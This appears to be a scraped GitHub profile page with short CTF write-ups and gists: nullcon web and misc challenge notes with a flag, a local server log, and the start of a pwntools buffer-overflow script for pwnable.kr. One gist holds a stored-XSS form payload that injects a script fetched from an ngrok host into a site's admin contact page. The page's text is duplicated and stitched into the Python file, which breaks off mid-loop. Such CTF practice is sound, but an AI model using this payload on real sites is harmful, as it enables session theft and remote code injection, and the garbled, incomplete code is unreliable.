Rewanth Tammana rewanthtammana

## nullconCTF - web 2
THere is a hidden .git folder
You can use Git-tools (https://github.com/internetwache/GitTools) to download the .git folder and extract the files.

First dump the files using Dumper and then extract the files of each commit using Extractor. Both these tools are available in the above link.

Once you download the files and analyze them you can see an index.php file deleted and you can see its code as we extracted is using Extractor in the above step.

URI: 3e90c63922fa145442bb58d18b62af6c21717fee/index.php

In the index.php the login validation function is as follows,

## nullconCTF - misc 2
Hints given - I don't like HTTP but I like table tennis.
Table tennis is also called as ping pong. This means the data is transmitted in ping packets. So, our data is in ICMP packets.

Add a filter in wireshark, ip.proto=="icmp" and you will get all the icmp packets.

You can also see that there is a data value in the ICMP packets. There are so many data packets and I used tshark to automate extration stuff but the results were not of any use.
Then I observed the size of data in each packet varies, they are of different sizes like 48 bytes and 2 bytes.
You can clearly see that the 48 byte packets are trash data. So, I manually written all the 2 bytes values on the paper and then decoded that value which gave me the flag.

Flag - hackim18{'51mpL3st_Ch4ll3ng3_s0lv3d'}

## gist:104dee4e8d12a81da50a302f33fec5c7

Serving HTTP on 0.0.0.0 port 8000 ...
127.0.0.1 - - [22/Oct/2017 21:29:11] "GET / HTTP/1.1" 200 -
127.0.0.1 - - [22/Oct/2017 21:29:11] code 404, message File not found
127.0.0.1 - - [22/Oct/2017 21:29:11] "GET /favicon.ico HTTP/1.1" 404 -
127.0.0.1 - - [22/Oct/2017 21:29:40] "GET /ew.js HTTP/1.1" 200 -
127.0.0.1 - - [22/Oct/2017 21:30:11] "GET /ew.js HTTP/1.1" 200 -
127.0.0.1 - - [22/Oct/2017 21:30:12] code 404, message File not found
127.0.0.1 - - [22/Oct/2017 21:30:12] "GET /favicon.ico HTTP/1.1" 404 -
127.0.0.1 - - [22/Oct/2017 21:33:38] "GET /ew.js HTTP/1.1" 200 -

## gist:32aa55316f6a52fb57fb881a55bcceb3
http://1128152f.ngrok.io/ew.js -> redirection script

------------------------------------------------
<!--Actual file to be run-->
<form id='f' action="http://bloodsuckers.world/admin/contact" method='POST'>
<input type="text" name="name" value="';x='">
<input type="text" name="name" value="';var script = document.createElement('script'); script.src = 'http://1128152f.ngrok.io/ew.js';document.body.appendChild(script);//">
<input type="text" name="message" value="hohoho">
</form>

## bof.py
# Download : http://pwnable.kr/bin/bof
# Download : http://pwnable.kr/bin/bof.c

from pwn import *
import struct
import time
import re

for i in range(0,100):
	s = remote('pwnable.kr', 9000)
	THere is a hidden .git folder
	You can use Git-tools (https://github.com/internetwache/GitTools) to download the .git folder and extract the files.

	First dump the files using Dumper and then extract the files of each commit using Extractor. Both these tools are available in the above link.

	Once you download the files and analyze them you can see an index.php file deleted and you can see its code as we extracted is using Extractor in the above step.

	URI: 3e90c63922fa145442bb58d18b62af6c21717fee/index.php

	In the index.php the login validation function is as follows,
	Hints given - I don't like HTTP but I like table tennis.
	Table tennis is also called as ping pong. This means the data is transmitted in ping packets. So, our data is in ICMP packets.

	Add a filter in wireshark, ip.proto=="icmp" and you will get all the icmp packets.

	You can also see that there is a data value in the ICMP packets. There are so many data packets and I used tshark to automate extration stuff but the results were not of any use.
	Then I observed the size of data in each packet varies, they are of different sizes like 48 bytes and 2 bytes.
	You can clearly see that the 48 byte packets are trash data. So, I manually written all the 2 bytes values on the paper and then decoded that value which gave me the flag.

	Flag - hackim18{'51mpL3st_Ch4ll3ng3_s0lv3d'}

	Serving HTTP on 0.0.0.0 port 8000 ...
	127.0.0.1 - - [22/Oct/2017 21:29:11] "GET / HTTP/1.1" 200 -
	127.0.0.1 - - [22/Oct/2017 21:29:11] code 404, message File not found
	127.0.0.1 - - [22/Oct/2017 21:29:11] "GET /favicon.ico HTTP/1.1" 404 -
	127.0.0.1 - - [22/Oct/2017 21:29:40] "GET /ew.js HTTP/1.1" 200 -
	127.0.0.1 - - [22/Oct/2017 21:30:11] "GET /ew.js HTTP/1.1" 200 -
	127.0.0.1 - - [22/Oct/2017 21:30:12] code 404, message File not found
	127.0.0.1 - - [22/Oct/2017 21:30:12] "GET /favicon.ico HTTP/1.1" 404 -
	127.0.0.1 - - [22/Oct/2017 21:33:38] "GET /ew.js HTTP/1.1" 200 -
	http://1128152f.ngrok.io/ew.js -> redirection script

	------------------------------------------------
	<!--Actual file to be run-->
	<form id='f' action="http://bloodsuckers.world/admin/contact" method='POST'>
	<input type="text" name="name" value="';x='">
	<input type="text" name="name" value="';var script = document.createElement('script'); script.src = 'http://1128152f.ngrok.io/ew.js';document.body.appendChild(script);//">
	<input type="text" name="message" value="hohoho">
	</form>
	# Download : http://pwnable.kr/bin/bof
	# Download : http://pwnable.kr/bin/bof.c

	from pwn import *
	import struct
	import time
	import re

	for i in range(0,100):
	s = remote('pwnable.kr', 9000)